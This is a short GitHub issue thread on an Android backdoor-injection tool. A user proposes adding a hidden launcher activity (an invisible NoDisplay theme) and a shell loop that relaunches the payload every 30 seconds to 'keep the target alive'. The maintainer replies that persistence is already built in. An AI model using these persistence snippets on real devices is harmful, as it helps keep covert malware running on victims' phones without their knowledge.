### ISSUE TITLE
please include MainActivity

### ISSUE THREAD

**Issue by WiredLife** [dana-at-cp/backdoor-apk#162]
Please include this:
``
        <activity android:label="@string/app_name" android:name=".MainActivity" android:theme="@android:style/Theme.NoDisplay">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </activity>"``
from the payload AndroidManifest.xml
so we can keep the target alive with this script:
while true; do sleep 30; am start --user 0 -a android.intent.action.MAIN -n com.APPNAMEHERE/.MainActivity; done

Great work!
Thanks all the way :)

**Comment by dana-at-cp** [comment]
There is persistence built-in that is supported in most cases.
